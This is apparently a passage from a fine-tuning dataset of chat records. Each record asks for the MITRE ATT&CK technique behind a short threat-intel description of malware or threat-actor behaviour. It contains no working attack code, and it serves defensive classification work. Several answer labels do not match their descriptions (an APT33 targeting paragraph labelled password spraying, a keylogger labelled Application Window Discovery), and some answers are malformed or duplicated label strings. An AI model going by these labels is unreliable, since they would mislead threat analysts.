- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to gather information about the operating system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses WMI to check for anti-virus software installed on the system."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bankshot writes data into the Registry key \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Pniumj\"."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM has used an RSS feed on Livejournal to update a list of encrypted C2 server names."
- },
- {
- "role": "assistant",
- "content": "T1102.001 - Dead Drop Resolver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Egregor has used rundll32 during execution."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DCSrv's configuration is encrypted."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA551 has used encoded ASCII text for initial C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has used command-line interfaces for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used automated collection."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "yty has some basic anti-sandbox detection that tries to detect Virtual PC, Sandboxie, and VMware."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In early February 2022, we witnessed an intrusion employing Gootloader (aka GootKit) as the initial access vector. The intrusion lasted two days and comprised discovery, persistence, lateral movement, collection, defense evasion, credential access and command and control activity. During the post-exploitation phase, the threat actors used RDP, WMI, Mimikatz, Lazagne,… ."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The RAT has a keylogger."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Darkhotel's selective infector modifies executables stored on removable media as a method of spreading across computers."
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ruler can be used to enumerate Exchange users and dump the GAL."
- },
- {
- "role": "assistant",
- "content": "T1087.003 - Email Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hildegard has packed ELF files into other binaries."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke has used SSH private keys on the infected machine to spread its coinminer throughout a network."
- },
- {
- "role": "assistant",
- "content": "T1552.004 - Unsecured Credentials: Private Keys"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Smoke Loader recursively searches through directories for files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Another interesting characteristic of the malicious documents is that the metadata associated with the document files themselves also matches that found in many of the malicious documents that were previously being used to spread Remcos.Figure 3: Document metadataAdditionally, the creation and modification dates associated with these documents are shortly after we released a detailed analysis of Remcos distribution campaigns that were being observed throughout 2018"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The exploit used, named EternalBlue, exploits a vulnerability in the Server Message Block (SMB) protocol which allows the malware to spread to all unpatched Windows systems from XP to 2016 on a network that have this protocol enabled. This vulnerability allows remote code execution over SMB v1. WannaCry utilizes this exploit by crafting a custom SMB session request with hard-coded values based on the target system"
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 used batch scripts to enumerate users on a victim domain controller."
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While the IronPython scripts are only the first part of the tool, the main task of loading malware is done by an embedded process injector. We dubbed this toolchain IronNetInjector, the blend of IronPython and the injector’s internal project name NetInjector. In this blog, we describe the IronPython scripts and how they’re used to load one or more payloads with the help of an injector"
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python', 'T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sakula uses HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting aligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical production"
- },
- {
- "role": "assistant",
- "content": "T1110.003 - Brute Force: Password Spraying"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil has encrypted C2 communications with the ECIES algorithm."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "However, in this new variant, all the DNS activity is initiated and executed solely from memory – unlike previous attacks which used PowerShell commands"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has run a keylogger plug-in on a victim."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "VERMIN gathers the local IP address."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can take regular screenshots when certain applications are open that are sent to the command and control server."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "USBferry can use \"tasklist\" to gather information about the process running on the infected system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses DNS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper has started a web service in the target host and wait for the adversary to connect, acting as a web shell."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used multiple proxies to obfuscate network traffic from victims."
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attack is part of a trend where threat groups hide malicious activity by communicating with legitimate web services such as social networking and cloud storage sites to foil detection efforts.[2][3] A Cyber Campaign Likely Intended to Monitor Hong Kong Media During a Period of Crisis The threat group has previously used newsworthy events as lures to deliver malware.[4] They have largely targeted organizations involved in financial, economic and trade policy, typically using publicly available RATs such as Poison Ivy, as well some non-public backdoors.[5] The group started targeting Hong Kong media companies, probably in response to political and economic challenges in Hong Kong and China"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar has been signed with fake certificates including those appearing to be from VB CORPORATE PTY. LTD."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used the Plink command-line utility to create SSH tunnels to C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel', 'T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To perform this task, the developer used the GDI API: A keylogger is also present in the analyzed sample. The SetWindowsHookEx() API is used to retrieve the stroked keys. The GetKeyNameText() API is used to retrieve a string that represents the name of a key. In addition to the key, the title of the foreground window is stored in order to known where the infected user is typing (by using the GetForegroundWindow() and GetWindowText() API"
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WarzoneRAT has the capability to act as a reverse proxy."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rising Sun can delete files and artifacts it creates."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the victim's IP address."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors used a script to collect information about the infected system."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware encrypts user files, demanding a fee of either $300 or $600 worth of bitcoins to an address specified in the instructions displayed after infection"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Explosive has a function to call the OpenClipboard wrapper."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Before writing to disk, Kwampirs inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A SUGARDUMP variant used SMTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.003 - Mail Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Message 3: Headers Received: by mailcenter.support Sender Mercator Institute for China Studies Subject Authoritarian advance Responding to Chinas growing political influence in Europe Body Content and images included within the e-mail body were a direct copy of the following MERICS report: https://www.merics.org/sites/default/files/2018-02/GPPi_MERICS_Authoritarian_Advance_2018_1.pdf Notes The hyperlinked text Click here to download the report within the e-mail body lead to a malicious RTF document located at the URL hxxp://www.mericcs.org/GPPi_MERICS_Authoritarian_Advance_2018_1Q.doc"
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mongall can download files to targeted systems."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MSTIC has observed NICKEL actors using exploits against unpatched systems to compromise remote access services and appliances. Upon successful intrusion, they have used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts. NICKEL actors created and deployed custom malware that allowed them to maintain persistence on victim networks over extended periods of time. MSTIC has also observed NICKEL perform frequent and scheduled data collection and exfiltration from victim networks"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery', 'T1119 - Automated Collection', 'T1587.001 - Malware', 'T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PipeMon can install additional modules via C2 commands."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nidiran can create a new service named msamger (Microsoft Security Accounts Manager)."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cuba can discover shared resources using the \"NetShareEnum\" API call."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Actors enumerated files and directories or may search in specific locations of a host or network share for certain information within a file system."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has functionality to copy itself to network shares."
- },
- {
- "role": "assistant",
- "content": "T1080 - Taint Shared Content"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LazyScripter has used batch files to deploy open-source and multi-stage RATs."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper has detected a target system’s OS version."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Inception used chains of compromised routers to proxy C2 communications between them and cloud service providers."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "netsh can be used to set up a proxy tunnel to allow remote host access to an infected host."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "xCaon has leveraged native OS function calls to retrieve victim's network adapter's information using GetAdapterInfo() API."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DustySky created folders in temp directories to host collected files before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bankshot collects files from the local system."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As we can see, the following information is present within this configuration: Remote Command and Control (C2) server Remote port Sleep timer Reaver continues to collect various information from the victim machine, including the following: CPU speed Computer name Username IP Address Microsoft Windows version Physical and virtual memory information The malware proceeds to communicate with the remote server via HTTP GET and POST requests"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerShower has sent HTTP GET and POST requests to C2 servers to send information and receive instructions."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Orangeworm has used HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CrackMapExec can enumerate the domain user accounts on a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the threat actor mapped the network and obtained credentials (through net use), they began to move laterally. The threat actor relied on WMI and PsExec to move laterally and install their tools across multiple assets"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The script will first attempt to communicate with the C2 server using HTTPS (HTTP if unsuccessful), which involves GET requests using the session ID within the request’s cookie in the PHPSESSID field, as seen in the example GET request: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246Host: www.rdppath[.]comCookie: PHPSESSID=Connection: Keep-Alive If the payload is unable to reach the C2 via HTTPS/HTTP, the payload yet again falls back to DNS tunneling"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1041 - Exfiltration Over C2 Channel', 'T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SideTwist can embed C2 responses in the source code of a fake Flickr webpage."
- },
- {
- "role": "assistant",
- "content": "T1001 - Data Obfuscation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has exploited CVE-2018-0798 in Equation Editor."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Controlled by Micropsia operators, the malware is able to register to an event of USB volume insertion to detect new connected USB flash drives. Once an event is triggered, Micropsia executes an RAR tool to recursively archive files based on a predefined list of file extensions (*.xls, *.xlsx, *.csv, *.odt, *.doc, *.docx, *.ppt, *.pptx, *.pdf, *.mdb, *.accdb, *.accde, *.txt"
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility', 'T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a custom DNS tunneling protocol for C2."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Briba uses rundll32 within Registry Run Keys / Startup Folder entries to execute malicious DLLs."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has used various forms of spearphishing in attempts to get users to open malicious attachments."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "However, the attacks different stages were hosted on a variety of free sites such as Mailimg, Github, Pastebin, dev-point.co, a.pomf.cat, and upload.cat"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
